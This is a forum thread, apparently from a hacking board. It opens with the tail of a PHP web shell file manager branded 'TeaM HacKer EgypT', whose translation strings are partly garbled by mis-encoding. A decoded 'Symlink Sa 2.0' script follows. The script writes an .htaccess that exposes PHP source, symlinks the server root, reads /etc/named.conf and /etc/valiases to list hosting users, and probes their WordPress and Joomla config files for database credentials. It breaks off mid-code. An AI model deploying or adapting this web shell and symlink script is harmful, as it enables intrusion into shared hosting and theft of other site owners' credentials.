    'edit' => 'bewerken',
    'download' => 'downloaden',
    'upload' => 'uploaden',
    'create' => 'aanmaken',
    'change' => 'veranderen',
    'save' => 'opslaan',
    'set' => 'instellen',
    'reset' => 'resetten',
    'relative' => 'Relatief pat naar doel',
    
    'yes' => 'Ja',
    'no' => 'Nee',
    'back' => 'terug',
    'destination' => 'Bestemming',
    'symlink' => 'Symlink',
    'no_output' => 'geen output',
    
    'user' => 'Gebruiker',
    'password' => 'Wachtwoord',
    'add' => 'toevoegen',
    'add_basic_auth' => 'add basic-authentification',
    
    'uploaded' => '"[%1]" is verstuurd.',
    'not_uploaded' => '"[%1]" kan niet worden verstuurd.',
    'already_exists' => '"[%1]" bestaat al.',
    'created' => '"[%1]" is aangemaakt.',
    'not_created' => '"[%1]" kan niet worden aangemaakt.',
    'really_delete' => 'Deze bestanden verwijderen?',
    'deleted' => "Deze bestanden zijn verwijderd:\n[%1]",
    'not_deleted' => "Deze bestanden konden niet worden verwijderd:\n[%1]",
    'rename_file' => 'Bestandsnaam veranderen:',
    'renamed' => '"[%1]" heet nu "[%2]".',
    'not_renamed' => '"[%1] kon niet worden veranderd in "[%2]".',
    'move_files' => 'Verplaats deze bestanden:',
    'moved' => "Deze bestanden zijn verplaatst naar \"[%2]\":\n[%1]",
    'not_moved' => "Kan deze bestanden niet verplaatsen naar \"[%2]\":\n[%1]",
    'copy_files' => 'Kopieer deze bestanden:',
    'copied' => "Deze bestanden zijn gekopieerd naar \"[%2]\":\n[%1]",
    'not_copied' => "Deze bestanden kunnen niet worden gekopieerd naar \"[%2]\":\n[%1]",
    'not_edited' => '"[%1]" kan niet worden bewerkt.',
    'executed' => "\"[%1]\" is met succes uitgevoerd:\n{%2}",
    'not_executed' => "\"[%1]\" is niet goed uitgevoerd:\n{%2}",
    'saved' => '"[%1]" is opgeslagen.',
    'not_saved' => '"[%1]" is niet opgeslagen.',
    'symlinked' => 'Symlink van "[%2]" naar "[%1]" is aangemaakt.',
    'not_symlinked' => 'Symlink van "[%2]" naar "[%1]" is niet aangemaakt.',
    'permission_for' => 'Bevoegdheid voor "[%1]":',
    'permission_set' => 'Bevoegdheid van "[%1]" is ingesteld op [%2].',
    'permission_not_set' => 'Bevoegdheid van "[%1]" is niet ingesteld op [%2].',
    'not_readable' => '"[%1]" kan niet worden gelezen.'
    		);
    
    	case 'se':
    
    		$date_format = 'n/j/y H:i:s';
    		$word_charset = 'ISO-8859-1';
     
    		return array(
    'directory' => 'Mapp',
    'file' => 'Fil',
    'filename' => 'Filnamn',
     
    'size' => 'Storlek',
    'permission' => 'SÙ†kerhetsnivÙ‡',
    'owner' => 'ؤgare',
    'group' => 'Grupp',
    'other' => 'Andra',
    'functions' => 'Funktioner',
     
    'read' => 'LÙ†s',
    'write' => 'Skriv',
    'execute' => 'Utfِr',
     
    'create_symlink' => 'Skapa symlink',
    'delete' => 'Radera',
    'rename' => 'Byt namn',
    'move' => 'Flytta',
    'copy' => 'Kopiera',
    'edit' => 'ؤndra',
    'download' => 'Ladda ner',
    'upload' => 'Ladda upp',
    'create' => 'Skapa',
    'change' => 'ؤndra',
    'save' => 'Spara',
    'set' => 'Markera',
    'reset' => 'Tِm',
    'relative' => 'Relative path to target',
     
    'yes' => 'Ja',
    'no' => 'Nej',
    'back' => 'Tillbaks',
    'destination' => 'Destination',
    'symlink' => 'Symlink',
    'no_output' => 'no output',
     
    'user' => 'AnvÙ†ndare',
    'password' => 'Lِsenord',
    'add' => 'LÙ†gg till',
    'add_basic_auth' => 'add basic-authentification',
     
    'uploaded' => '"[%1]" har laddats upp.',
    'not_uploaded' => '"[%1]" kunde inte laddas upp.',
    'already_exists' => '"[%1]" finns redan.',
    'created' => '"[%1]" har skapats.',
    'not_created' => '"[%1]" kunde inte skapas.',
    'really_delete' => 'Radera dessa filer?',
    'deleted' => "De hÙ†r filerna har raderats:\n[%1]",
    'not_deleted' => "Dessa filer kunde inte raderas:\n[%1]",
    'rename_file' => 'Byt namn pÙ‡ fil:',
    'renamed' => '"[%1]" har bytt namn till "[%2]".',
    'not_renamed' => '"[%1] kunde inte dِpas om till "[%2]".',
    'move_files' => 'Flytta dessa filer:',
    'moved' => "Dessa filer har flyttats till \"[%2]\":\n[%1]",
    'not_moved' => "Dessa filer kunde inte flyttas till \"[%2]\":\n[%1]",
    'copy_files' => 'Kopiera dessa filer:',
    'copied' => "Dessa filer har kopierats till \"[%2]\":\n[%1]",
    'not_copied' => "Dessa filer kunde inte kopieras till \"[%2]\":\n[%1]",
    'not_edited' => '"[%1]" kan inte Ù†ndras.',
    'executed' => "\"[%1]\" har utfِrts:\n{%2}",
    'not_executed' => "\"[%1]\" kunde inte utfِras:\n{%2}",
    'saved' => '"[%1]" har sparats.',
    'not_saved' => '"[%1]" kunde inte sparas.',
    'symlinked' => 'Symlink frÙ‡n "[%2]" till "[%1]" har skapats.',
    'not_symlinked' => 'Symlink frÙ‡n "[%2]" till "[%1]" kunde inte skapas.',
    'permission_for' => 'Rنttigheter fِr "[%1]":',
    'permission_set' => 'Rنttigheter fِr "[%1]" نndrades till [%2].',
    'permission_not_set' => 'Permission of "[%1]" could not be set to [%2].',
    'not_readable' => '"[%1]" kan inte lÙ†sas.'
    		);
    
    	case 'sp':
    
    		$date_format = 'j/n/y H:i:s';
    		$word_charset = 'ISO-8859-1';
    
    		return array(
    'directory' => 'Directorio',
    'file' => 'Archivo',
    'filename' => 'Nombre Archivo',
    
    'size' => 'TamaÙŒo',
    'permission' => 'Permisos',
    'owner' => 'Propietario',
    'group' => 'Grupo',
    'other' => 'Otros',
    'functions' => 'Funciones',
    
    'read' => 'lectura',
    'write' => 'escritura',
    'execute' => 'ejecuciÙŽn',
    
    'create_symlink' => 'crear enlace',
    'delete' => 'borrar',
    'rename' => 'renombrar',
    'move' => 'mover',
    'copy' => 'copiar',
    'edit' => 'editar',
    'download' => 'bajar',
    'upload' => 'subir',
    'create' => 'crear',
    'change' => 'cambiar',
    'save' => 'salvar',
    'set' => 'setear',
    'reset' => 'resetear',
    'relative' => 'Path relativo',
    
    'yes' => 'Si',
    'no' => 'No',
    'back' => 'atrÙ„s',
    'destination' => 'Destino',
    'symlink' => 'Enlace',
    'no_output' => 'sin salida',
    
    'user' => 'Usuario',
    'password' => 'Clave',
    'add' => 'agregar',
    'add_basic_auth' => 'agregar autentificaciÙŽn bÙ„sica',
    
    'uploaded' => '"[%1]" ha sido subido.',
    'not_uploaded' => '"[%1]" no pudo ser subido.',
    'already_exists' => '"[%1]" ya existe.',
    'created' => '"[%1]" ha sido creado.',
    'not_created' => '"[%1]" no pudo ser creado.',
    'really_delete' => 'ØŸBorra estos archivos?',
    'deleted' => "Estos archivos han sido borrados:\n[%1]",
    'not_deleted' => "Estos archivos no pudieron ser borrados:\n[%1]",
    'rename_file' => 'Renombra archivo:',
    'renamed' => '"[%1]" ha sido renombrado a "[%2]".',
    'not_renamed' => '"[%1] no pudo ser renombrado a "[%2]".',
    'move_files' => 'Mover estos archivos:',
    'moved' => "Estos archivos han sido movidos a \"[%2]\":\n[%1]",
    'not_moved' => "Estos archivos no pudieron ser movidos a \"[%2]\":\n[%1]",
    'copy_files' => 'Copiar estos archivos:',
    'copied' => "Estos archivos han sido copiados a  \"[%2]\":\n[%1]",
    'not_copied' => "Estos archivos no pudieron ser copiados \"[%2]\":\n[%1]",
    'not_edited' => '"[%1]" no pudo ser editado.',
    'executed' => "\"[%1]\" ha sido ejecutado correctamente:\n{%2}",
    'not_executed' => "\"[%1]\" no pudo ser ejecutado correctamente:\n{%2}",
    'saved' => '"[%1]" ha sido salvado.',
    'not_saved' => '"[%1]" no pudo ser salvado.',
    'symlinked' => 'Enlace desde "[%2]" a "[%1]" ha sido creado.',
    'not_symlinked' => 'Enlace desde "[%2]" a "[%1]" no pudo ser creado.',
    'permission_for' => 'Permisos de "[%1]":',
    'permission_set' => 'Permisos de "[%1]" fueron seteados a [%2].',
    'permission_not_set' => 'Permisos de "[%1]" no pudo ser seteado a [%2].',
    'not_readable' => '"[%1]" no pudo ser leÙŠdo.'
    		);
    
    	case 'dk':
    
    		$date_format = 'n/j/y H:i:s';
    		$word_charset = 'ISO-8859-1';
    
    		return array(
    'directory' => 'Mappe',
    'file' => 'Fil',
    'filename' => 'Filnavn',
    
    'size' => 'StÙ‘rrelse',
    'permission' => 'Rettighed',
    'owner' => 'Ejer',
    'group' => 'Gruppe',
    'other' => 'Andre',
    'functions' => 'Funktioner',
    
    'read' => 'lÙˆs',
    'write' => 'skriv',
    'execute' => 'kÙ‘r',
    
    'create_symlink' => 'opret symbolsk link',
    'delete' => 'slet',
    'rename' => 'omdÙ‘b',
    'move' => 'flyt',
    'copy' => 'kopier',
    'edit' => 'rediger',
    'download' => 'download',
    'upload' => 'upload',
    'create' => 'opret',
    'change' => 'skift',
    'save' => 'gem',
    'set' => 'sÙˆt',
    'reset' => 'nulstil',
    'relative' => 'Relativ sti til valg',
    
    'yes' => 'Ja',
    'no' => 'Nej',
    'back' => 'tilbage',
    'destination' => 'Distination',
    'symlink' => 'Symbolsk link',
    'no_output' => 'ingen resultat',
    
    'user' => 'Bruger',
    'password' => 'Kodeord',
    'add' => 'tilfÙ‘j',
    'add_basic_auth' => 'tilfÙ‘j grundliggende rettigheder',
    
    'uploaded' => '"[%1]" er blevet uploaded.',
    'not_uploaded' => '"[%1]" kunnu ikke uploades.',
    'already_exists' => '"[%1]" findes allerede.',
    'created' => '"[%1]" er blevet oprettet.',
    'not_created' => '"[%1]" kunne ikke oprettes.',
    'really_delete' => 'Slet disse filer?',
    'deleted' => "Disse filer er blevet slettet:\n[%1]",
    'not_deleted' => "Disse filer kunne ikke slettes:\n[%1]",
    'rename_file' => 'OmdÙ‘d fil:',
    'renamed' => '"[%1]" er blevet omdÙ‘bt til "[%2]".',
    'not_renamed' => '"[%1] kunne ikke omdÙ‘bes til "[%2]".',
    'move_files' => 'Flyt disse filer:',
    'moved' => "Disse filer er blevet flyttet til \"[%2]\":\n[%1]",
    'not_moved' => "Disse filer kunne ikke flyttes til \"[%2]\":\n[%1]",
    'copy_files' => 'Kopier disse filer:',
    'copied' => "Disse filer er kopieret til \"[%2]\":\n[%1]",
    'not_copied' => "Disse filer kunne ikke kopieres til \"[%2]\":\n[%1]",
    'not_edited' => '"[%1]" kan ikke redigeres.',
    'executed' => "\"[%1]\" er blevet kÙ‘rt korrekt:\n{%2}",
    'not_executed' => "\"[%1]\" kan ikke kÙ‘res korrekt:\n{%2}",
    'saved' => '"[%1]" er blevet gemt.',
    'not_saved' => '"[%1]" kunne ikke gemmes.',
    'symlinked' => 'Symbolsk link fra "[%2]" til "[%1]" er blevet oprettet.',
    'not_symlinked' => 'Symbolsk link fra "[%2]" til "[%1]" kunne ikke oprettes.',
    'permission_for' => 'Rettigheder for "[%1]":',
    'permission_set' => 'Rettigheder for "[%1]" blev sat til [%2].',
    'permission_not_set' => 'Rettigheder for "[%1]" kunne ikke sÙˆttes til [%2].',
    'not_readable' => '"[%1]" Kan ikke lÙˆses.'
    		);
    
    	case 'tr':
    
    		$date_format = 'n/j/y H:i:s';
    		$word_charset = 'ISO-8859-1';
    
    		return array(
    'directory' => 'Klasِr',
    'file' => 'Dosya',
    'filename' => 'dosya adi',
    
    'size' => 'boyutu',
    'permission' => 'Izin',
    'owner' => 'sahib',
    'group' => 'Grup',
    'other' => 'Digerleri',
    'functions' => 'Fonksiyonlar',
    
    'read' => 'oku',
    'write' => 'yaz',
    'execute' => 'alistir',
    
    'create_symlink' => 'yarat symlink',
    'delete' => 'sil',
    'rename' => 'ad degistir',
    'move' => 'tasi',
    'copy' => 'kopyala',
    'edit' => 'dzenle',
    'download' => 'indir',
    'upload' => 'ykle',
    'create' => 'create',
    'change' => 'degistir',
    'save' => 'kaydet',
    'set' => 'ayar',
    'reset' => 'sifirla',
    'relative' => 'Hedef yola gِre',
    
    'yes' => 'Evet',
    'no' => 'Hayir',
    'back' => 'Geri',
    'destination' => 'Hedef',
    'symlink' => 'K‎sa yol',
    'no_output' => 'ikti yok',
    
    'user' => 'Kullanici',
    'password' => 'Sifre',
    'add' => 'ekle',
    'add_basic_auth' => 'ekle basit-authentification',
    
    'uploaded' => '"[%1]" yklendi.',
    'not_uploaded' => '"[%1]" yklenemedi.',
    'already_exists' => '"[%1]" kullanilmakta.',
    'created' => '"[%1]" olusturuldu.',
    'not_created' => '"[%1]" olusturulamadi.',
    'really_delete' => 'Bu dosyalari silmek istediginizden eminmisiniz?',
    'deleted' => "Bu dosyalar silindi:\n[%1]",
    'not_deleted' => "Bu dosyalar silinemedi:\n[%1]",
    'rename_file' => 'Adi degisen dosya:',
    'renamed' => '"[%1]" adili dosyanin yeni adi "[%2]".',
    'not_renamed' => '"[%1] adi degistirilemedi "[%2]" ile.',
    'move_files' => 'Tasinan dosyalar:',
    'moved' => "Bu dosyalari tasidiginiz yer \"[%2]\":\n[%1]",
    'not_moved' => "Bu dosyalari tasiyamadiginiz yer \"[%2]\":\n[%1]",
    'copy_files' => 'Kopyalanan dosyalar:',
    'copied' => "Bu dosyalar kopyalandi \"[%2]\":\n[%1]",
    'not_copied' => "Bu dosyalar kopyalanamiyor \"[%2]\":\n[%1]",
    'not_edited' => '"[%1]" dzenlenemiyor.',
    'executed' => "\"[%1]\" basariyla alistirildi:\n{%2}",
    'not_executed' => "\"[%1]\" alistirilamadi:\n{%2}",
    'saved' => '"[%1]" kaydedildi.',
    'not_saved' => '"[%1]" kaydedilemedi.',
    'symlinked' => '"[%2]" den "[%1]" e k‎sayol olu‏turuldu.',
    'not_symlinked' => '"[%2]"den "[%1]" e k‎sayol olu‏turulamad‎.',
    'permission_for' => 'Izinler "[%1]":',
    'permission_set' => 'Izinler "[%1]" degistirildi [%2].',
    'permission_not_set' => 'Izinler "[%1]" degistirilemedi [%2].',
    'not_readable' => '"[%1]" okunamiyor.'
    		);
    
    	case 'cs':
    
    		$date_format = 'd.m.y H:i:s';
    		$word_charset = 'UTF-8';
    
    		return array(
    'directory' => 'Adresأ،إ™',
    'file' => 'Soubor',
    'filename' => 'Jmأno souboru',
    
    'size' => 'Velikost',
    'permission' => 'Prأ،va',
    'owner' => 'Vlastnأ*k',
    'group' => 'Skupina',
    'other' => 'Ostatnأ*',
    'functions' => 'Funkce',
    
    'read' => 'ؤŒtenأ*',
    'write' => 'Zأ،pis',
    'execute' => 'Spouإ،tؤ›nأ*',
    
    'create_symlink' => 'Vytvoإ™it symbolickأ odkaz',
    'delete' => 'Smazat',
    'rename' => 'Pإ™ejmenovat',
    'move' => 'Pإ™esunout',
    'copy' => 'Zkopأ*rovat',
    'edit' => 'Otevإ™أ*t',
    'download' => 'Stأ،hnout',
    'upload' => 'Nahraj na server',
    'create' => 'Vytvoإ™it',
    'change' => 'Zmؤ›nit',
    'save' => 'Uloإit',
    'set' => 'Nastavit',
    'reset' => 'zpؤ›t',
    'relative' => 'Relatif',
    
    'yes' => 'Ano',
    'no' => 'Ne',
    'back' => 'Zpؤ›t',
    'destination' => 'Destination',
    'symlink' => 'Symbolickأ odkaz',
    'no_output' => 'Prأ،zdnأ vأstup',
    
    'user' => 'UØ¥ivatel',
    'password' => 'Heslo',
    'add' => 'Pإ™idat',
    'add_basic_auth' => 'pإ™idej zأ،kladnأ* autentizaci',
    
    'uploaded' => 'Soubor "[%1]" byl nahrأ،n na server.',
    'not_uploaded' => 'Soubor "[%1]" nebyl nahrأ،n na server.',
    'already_exists' => 'Soubor "[%1]" uإ exituje.',
    'created' => 'Soubor "[%1]" byl vytvoإ™en.',
    'not_created' => 'Soubor "[%1]" nemohl bأt  vytvoإ™en.',
    'really_delete' => 'Vymazat soubor?',
    'deleted' => "Byly vymazأ،ny tyto soubory:\n[%1]",
    'not_deleted' => "Tyto soubory nemohly bأt vytvoإ™eny:\n[%1]",
    'rename_file' => 'Pإ™ejmenuj soubory:',
    'renamed' => 'Soubor "[%1]" byl pإ™ejmenovأ،n na "[%2]".',
    'not_renamed' => 'Soubor "[%1]" nemohl bأt pإ™ejmenovأ،n na "[%2]".',
    'move_files' => 'Pإ™emأ*stit tyto soubory:',
    'moved' => "Tyto soubory byly pإ™emأ*stؤ›ny do \"[%2]\":\n[%1]",
    'not_moved' => "Tyto soubory nemohly bأt pإ™emأ*stؤ›ny do \"[%2]\":\n[%1]",
    'copy_files' => 'Zkopأ*rovat tyto soubory:',
    'copied' => "Tyto soubory byly zkopأ*rovأ،ny do \"[%2]\":\n[%1]",
    'not_copied' => "Tyto soubory nemohly bأt zkopأ*rovأ،ny do \"[%2]\":\n[%1]",
    'not_edited' => 'Soubor "[%1]" nemohl bأt otevإ™en.',
    'executed' => "SOubor \"[%1]\" byl spuإ،tؤ›n :\n{%2}",
    'not_executed' => "Soubor \"[%1]\" nemohl bأt spuإ،tؤ›n:\n{%2}",
    'saved' => 'Soubor "[%1]" byl uloإen.',
    'not_saved' => 'Soubor "[%1]" nemohl bأt uloإen.',
    'symlinked' => 'Byl vyvoإ™en symbolickأ odkaz "[%2]" na soubor "[%1]".',
    'not_symlinked' => 'Symbolickأ odkaz "[%2]" na soubor "[%1]" nemohl bأt vytvoإ™en.',
    'permission_for' => 'Prأ،va k "[%1]":',
    'permission_set' => 'Prأ،va k "[%1]" byla zmؤ›nؤ›na na [%2].',
    'permission_not_set' => 'Prأ،va k "[%1]" nemohla bأt zmؤ›nؤ›na na [%2].',
    'not_readable' => 'Soubor "[%1]" nenأ* moإno pإ™eؤچأ*st.'
    		);
    
    	case 'en':
    	default:
    
    		$date_format = 'n/j/y H:i:s';
    		$word_charset = 'ISO-8859-1';
    
    		return array(
    'directory' => 'Directory',
    'file' => 'File',
    'filename' => 'Filename',
    
    'size' => 'Size',
    'permission' => 'Permission',
    'owner' => 'Owner',
    'group' => 'Group',
    'other' => 'Others',
    'functions' => 'Functions',
    
    'read' => 'read',
    'write' => 'write',
    'execute' => 'execute',
    
    'create_symlink' => 'create symlink',
    'delete' => 'delete',
    'rename' => 'rename',
    'move' => 'move',
    'copy' => 'copy',
    'edit' => 'edit',
    'download' => 'download',
    'upload' => 'upload',
    'create' => 'create',
    'change' => 'change',
    'save' => 'save',
    'set' => 'set',
    'reset' => 'reset',
    'relative' => 'Relative path to target',
    
    'yes' => 'Yes',
    'no' => 'No',
    'back' => 'back',
    'destination' => 'Destination',
    'symlink' => 'Symlink',
    'no_output' => 'no output',
    
    'user' => 'User',
    'password' => 'Password',
    'add' => 'add',
    'add_basic_auth' => 'add basic-authentification',
    
    'uploaded' => '"[%1]" has been uploaded.',
    'not_uploaded' => '"[%1]" could not be uploaded.',
    'already_exists' => '"[%1]" already exists.',
    'created' => '"[%1]" has been created.',
    'not_created' => '"[%1]" could not be created.',
    'really_delete' => 'Delete these files?',
    'deleted' => "These files have been deleted:\n[%1]",
    'not_deleted' => "These files could not be deleted:\n[%1]",
    'rename_file' => 'Rename file:',
    'renamed' => '"[%1]" has been renamed to "[%2]".',
    'not_renamed' => '"[%1] could not be renamed to "[%2]".',
    'move_files' => 'Move these files:',
    'moved' => "These files have been moved to \"[%2]\":\n[%1]",
    'not_moved' => "These files could not be moved to \"[%2]\":\n[%1]",
    'copy_files' => 'Copy these files:',
    'copied' => "These files have been copied to \"[%2]\":\n[%1]",
    'not_copied' => "These files could not be copied to \"[%2]\":\n[%1]",
    'not_edited' => '"[%1]" can not be edited.',
    'executed' => "\"[%1]\" has been executed successfully:\n{%2}",
    'not_executed' => "\"[%1]\" could not be executed successfully:\n{%2}",
    'saved' => '"[%1]" has been saved.',
    'not_saved' => '"[%1]" could not be saved.',
    'symlinked' => 'Symlink from "[%2]" to "[%1]" has been created.',
    'not_symlinked' => 'Symlink from "[%2]" to "[%1]" could not be created.',
    'permission_for' => 'Permission of "[%1]":',
    'permission_set' => 'Permission of "[%1]" was set to [%2].',
    'permission_not_set' => 'Permission of "[%1]" could not be set to [%2].',
    'not_readable' => '"[%1]" can not be read.'
    		);
    
    	}
    
    }
    
    function getimage ($image) {
    	switch ($image) {
    	case 'file':
    		return base64_decode('R0lGODlhEQANAJEDAJmZmf///wAAAP///yH5BAHoAwMALAAAAAARAA0AAAItnIGJxg0B42rsiSvCA/REmXQWhmnih3LUSGaqg35vFbSXucbSabunjnMohq8CADsA');
    	case 'folder':
    		return base64_decode('R0lGODlhEQANAJEDAJmZmf///8zMzP///yH5BAHoAwMALAAAAAARAA0AAAIqnI+ZwKwbYgTPtIudlbwLOgCBQJYmCYrn+m3smY5vGc+0a7dhjh7ZbygAADsA');
    	case 'hidden_file':
    		return base64_decode('R0lGODlhEQANAJEDAMwAAP///5mZmf///yH5BAHoAwMALAAAAAARAA0AAAItnIGJxg0B42rsiSvCA/REmXQWhmnih3LUSGaqg35vFbSXucbSabunjnMohq8CADsA');
    	case 'link':
    		return base64_decode('R0lGODlhEQANAKIEAJmZmf///wAAAMwAAP///wAAAAAAAAAAACH5BAHoAwQALAAAAAARAA0AAAM5SArcrDCCQOuLcIotwgTYUllNOA0DxXkmhY4shM5zsMUKTY8gNgUvW6cnAaZgxMyIM2zBLCaHlJgAADsA');
    	case 'smiley':
    		return base64_decode('R0lGODlhEQANAJECAAAAAP//AP///wAAACH5BAHoAwIALAAAAAARAA0AAAIslI+pAu2wDAiz0jWD3hqmBzZf1VCleJQch0rkdnppB3dKZuIygrMRE/oJDwUAOwA=');
    	case 'arrow':
    		return base64_decode('R0lGODlhEQANAIABAAAAAP///yH5BAEKAAEALAAAAAARAA0AAAIdjA9wy6gNQ4pwUmav0yvn+hhJiI3mCJ6otrIkxxQAOw==');
    	}
    }
    
    function html_header () {
    	global $site_charset;
    
    	echo <<<END
    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
         "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
    <head>
    
    <meta http-equiv="Content-Type" content="text/html; charset=$site_charset" />
    
    <title>TeaM HacKer EgypT</title>
    
    <style type="text/css">
    body { font: small sans-serif; text-align: center }
    img { width: 17px; height: 13px }
    a, a:visited { text-decoration: none; color: navy }
    hr { border-style: none; height: 1px; background-color: silver; color: silver }
    #main { margin-top: 6pt; margin-left: auto; margin-right: auto; border-spacing: 1px }
    #main th { background: #eee; padding: 3pt 3pt 0pt 3pt }
    .listing th, .listing td { padding: 1px 3pt 0 3pt }
    .listing th { border: 1px solid silver }
    .listing td { border: 1px solid #ddd; background: white }
    .listing .checkbox { text-align: center }
    .listing .filename { text-align: left }
    .listing .size { text-align: right }
    .listing .permission_header { text-align: left }
    .listing .permission { font-family: monospace }
    .listing .owner { text-align: left }
    .listing .group { text-align: left }
    .listing .functions { text-align: left }
    .listing_footer td { background: #eee; border: 1px solid silver }
    #directory, #upload, #create, .listing_footer td, #error td, #notice td { text-align: left; padding: 3pt }
    #directory { background: #eee; border: 1px solid silver }
    #upload { padding-top: 1em }
    #create { padding-bottom: 1em }
    .small, .small option { font-size: x-small }
    textarea { border: none; background: white }
    table.dialog { margin-left: auto; margin-right: auto }
    td.dialog { background: #eee; padding: 1ex; border: 1px solid silver; text-align: center }
    #permission { margin-left: auto; margin-right: auto }
    #permission td { padding-left: 3pt; padding-right: 3pt; text-align: center }
    td.permission_action { text-align: right }
    #symlink { background: #eee; border: 1px solid silver }
    #symlink td { text-align: left; padding: 3pt }
    #red_button { width: 120px; color: #400 }
    #green_button { width: 120px; color: #040 }
    #error td { background: maroon; color: white; border: 1px solid silver }
    #notice td { background: green; color: white; border: 1px solid silver }
    #notice pre, #error pre { background: silver; color: black; padding: 1ex; margin-left: 1ex; margin-right: 1ex }
    code { font-size: 12pt }
    td { white-space: nowrap }
    </style>
    
    <script type="text/javascript">
    <!--
    function activate (name) {
    	if (document && document.forms[0] && document.forms[0].elements['focus']) {
    		document.forms[0].elements['focus'].value = name;
    	}
    }
    //-->
    </script>
    
    </head>
    <body>
    
    
    END;
    
    }
    
    function html_footer () {
    
    	echo <<<END
    </body>
    </html>
    END;
    
    }
    
    function notice ($phrase) {
    	global $cols;
    
    	$args = func_get_args();
    	array_shift($args);
    
    	return '<tr id="notice">
    	<td colspan="' . $cols . '">' . phrase($phrase, $args) . '</td>
    </tr>
    ';
    
    }
    
    function error ($phrase) {
    	global $cols;
    
    	$args = func_get_args();
    	array_shift($args);
    
    	return '<tr id="error">
    	<td colspan="' . $cols . '">' . phrase($phrase, $args) . '</td>
    </tr>
    ';
    
    }
    
    ?>
    
     
    • Thanks Thanks x 1
  17. Adam Xtubeage

    Adam Xtubeage Jr. VIP Jr. VIP Premium Member

    Joined:
    Jan 31, 2012
    Messages:
    143
    Likes Received:
    73
    Occupation:
    IM & ENJOYING LIFE & STUDYING....!
    Location:
    PARADISE
    hey mate i know it was from google...
    i just gave him an example i did not claim that i have found it...:p

    and you telling not to google...who does not google nowadays....bro google is the center for all things...doesnot matter of what catagory it is...so i just found that gave him for understanding...and ofcourse...i know it was not "sql injection" so what's the deal...i just mention as it is still the number one vulnerability in "OWASP" and i hope you know that...:D so I wrote so that other keep checking about that as many forget the main thing of securing themselves...:p

    And if you think i did some mistake by posting about the vulnerabilities...then you can surely think that ...i have no problem...my aim was just to aware all...so that they don't forget the main thing of securing themselves first.....:D


    ANYWAY THANKS FOR YOUR COMMENT......:D
     
  18. sockpuppet

    sockpuppet Junior Member

    Joined:
    Nov 7, 2011
    Messages:
    155
    Likes Received:
    145
    i have decoded the script from the url in the first post, actually a copy on pastebin
    Symlink Sa 2.0:
    Code:
    echo '  <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
        "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
    
    <html xmlns="http://www.w3.org/1999/xhtml">
    
    <head>
    <title>Symlink_Sa 2.0</title>
    
    <style type="text/css">
    
      html,body {
         margin: 0;
         padding: 0;
         outline: 0;
    }
    
    
    body {
        direction: ltr;
        background-color:#F4F4F4;
    	color: rgb(153, 153, 153);
        text-align: center
    }
    
    input,textarea,select{
    font-weight: bold;
    color: #111111;
    dashed #ffffff;
    border: 1px
    solid #BBBBBB;
    background-color: #DDDDDD;
    }
    
    
    .hedr {
      font-family: Tahoma, Arial, sans-serif  ;
      font-size: 22px;
    
    
    }
    
    .cont a{
    
     text-decoration: none;
     color:rgb(153, 153, 153);
     font-family: Tahoma, Arial, sans-serif  ;
     font-size: 16px;
     text-shadow: 0px 0px 3px ;
    }
    
    .cont a:hover{
    
    
      color: #EEEEEE ;
      text-shadow:0px 0px 3px #000000 ;
    
    
    }
    
    .tmp tr td{
    
    border: solid 1px #BBBBBB;
    
    padding: 2px ;
      font-size: 13px;
    }
    
    .tmp tr td a {
      text-decoration: none;
    
    
    
    }
    
    .foter{
      font-size: 9pt;
      color: #AAAAAA ;
      text-align: center
    }
    
    .tmp tr td:hover{
    
    box-shadow: 0px 0px 4px #888888;
    
    }
    .fot{
    
    font-family:Tahoma, Arial, sans-serif;
    
      font-size: 13pt;
    }
    
    .ir {
      color: #FF0000;
    }
    
    
    
    </style>
    
    </head>
    
    <body>
    
    <div class=\'all\'>
    
    
    ';
    @mkdir('sym',0777);
    $IIIIIIIIIIl1  = "Options all \n DirectoryIndex Sux.html \n AddType text/plain .php \n AddHandler server-parsed .php \n  AddType text/plain .html \n AddHandler txt .html \n Require None \n Satisfy Any";
    $IIIIIIIIII1I =@fopen ('sym/.htaccess','w');
    fwrite($IIIIIIIIII1I ,$IIIIIIIIIIl1);
    @symlink('/','sym/root');
    $IIIIIIIIIlIl = basename('/home/sockpuppet/www/fuck/org.php');
    echo '<br /><div class="hedr"> Symlink Sa 2.0 <br /></div>';
    echo '<br /><div class="hedr">-:[ User & Domains & Symlink ]:-<br /><br /></div>';
    echo '<div class="cont">
    
    [<a href="?"> Home </a>]
    
    [<a href="?sws=sym"> User & Domains & Symlink </a>]
    
    [<a href="?sws=sec"> Domains & Script </a>]
    
    [ <a href="?sws=file"> Symlink File </a>]<br /><br /><br />
    
    
    
    
    
    
    </div>';
    if(isset($_REQUEST['sws']))
    {
    switch ($_REQUEST['sws'])
    {
    case 'sec':
    $IIIIIIIIIllI = @file('/etc/named.conf');
    if(!$IIIIIIIIIllI)
    {
    die (" can't read /etc/named.conf");
    }
    else
    {
    echo "<div class='tmp'>
    <table align='center' width='40%'><td> Domains </td><td> Script </td>";
    foreach($IIIIIIIIIllI as $IIIIIIIIIll1){
    if(eregi('zone',$IIIIIIIIIll1)){
    preg_match_all('#zone "(.*)"#',$IIIIIIIIIll1,$IIIIIIIIIl11);
    flush();
    if(strlen(trim($IIIIIIIIIl11[1][0])) >2){
    $IIIIIIIII1I1 = posix_getpwuid(@fileowner('/etc/valiases/'.$IIIIIIIIIl11[1][0]));
    $IIIIIIIII1l1=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/wp-config.php';
    $IIIIIIIII11I=get_headers($IIIIIIIII1l1);
    $IIIIIIIII11l=$IIIIIIIII11I[0];
    $IIIIIIIII111=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/blog/wp-config.php';
    $IIIIIIIIlIII=get_headers($IIIIIIIII111);
    $IIIIIIIIlIIl=$IIIIIIIIlIII[0];
    $IIIIIIIIlII1=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/configuration.php';
    $IIIIIIIIlIlI=get_headers($IIIIIIIIlII1);
    $IIIIIIIIlIll=$IIIIIIIIlIlI[0];
    $IIIIIIIIlIl1=$IIIIIIIIIIIl.'/sym/root/home/'.$IIIIIIIII1I1['name'].'/public_html/joomla/configuration.php';
    $IIIIIIIIlI1I=get_headers($IIIIIIIIlIl1);
